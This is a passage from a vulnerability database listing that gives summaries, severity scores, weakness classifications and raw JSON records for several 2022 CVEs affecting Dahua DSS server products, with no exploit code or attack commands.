              "value": "Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Allocation of Resources Without Limits or Throttling",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-27T00:00:00.000Z",
            "orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            "shortName": "dahua"
          },
          "references": [
            {
              "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
        "assignerShortName": "dahua",
        "cveId": "CVE-2022-45434",
        "datePublished": "2022-12-27T00:00:00.000Z",
        "dateReserved": "2022-11-14T00:00:00.000Z",
        "dateUpdated": "2025-04-14T12:59:11.203Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-45433 (GCVE-0-2022-45433)

    Vulnerability from cvelistv5 – Published: 2022-12-27 00:00 – Updated: 2025-04-14 13:05
    VLAI
    Summary
    Some Dahua software products have a vulnerability of unauthenticated traceroute host from remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could get the traceroute results.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • Improper Access Control
    • CWE-306 - Missing Authentication for Critical Function
    Assigner
    Impacted products
    Vendor Product Version
    n/a DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 Affected: V8.0.2, V8.0.4, V8.1
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T14:09:57.038Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "HIGH",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "NONE",
                  "baseScore": 3.7,
                  "baseSeverity": "LOW",
                  "confidentialityImpact": "LOW",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-45433",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-14T13:05:16.598801Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-306",
                    "description": "CWE-306 Missing Authentication for Critical Function",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-14T13:05:43.020Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "V8.0.2, V8.0.4, V8.1"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Some Dahua software products have a vulnerability of unauthenticated traceroute host from remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could get the traceroute results."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Improper Access Control",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-27T00:00:00.000Z",
            "orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            "shortName": "dahua"
          },
          "references": [
            {
              "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
        "assignerShortName": "dahua",
        "cveId": "CVE-2022-45433",
        "datePublished": "2022-12-27T00:00:00.000Z",
        "dateReserved": "2022-11-14T00:00:00.000Z",
        "dateUpdated": "2025-04-14T13:05:43.020Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-45431 (GCVE-0-2022-45431)

    Vulnerability from cvelistv5 – Published: 2022-12-27 00:00 – Updated: 2025-04-11 23:07
    VLAI
    Summary
    Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • Improper Access Control
    • CWE-284 - Improper Access Control
    Assigner
    Impacted products
    Vendor Product Version
    n/a DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 Affected: V8.0.2, V8.0.4, V8.1
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T14:09:57.052Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 7.5,
                  "baseSeverity": "HIGH",
                  "confidentialityImpact": "NONE",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-45431",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-11T23:06:20.607432Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-284",
                    "description": "CWE-284 Improper Access Control",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-11T23:07:11.025Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "V8.0.2, V8.0.4, V8.1"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Improper Access Control",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-27T00:00:00.000Z",
            "orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            "shortName": "dahua"
          },
          "references": [
            {
              "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
        "assignerShortName": "dahua",
        "cveId": "CVE-2022-45431",
        "datePublished": "2022-12-27T00:00:00.000Z",
        "dateReserved": "2022-11-14T00:00:00.000Z",
        "dateUpdated": "2025-04-11T23:07:11.025Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }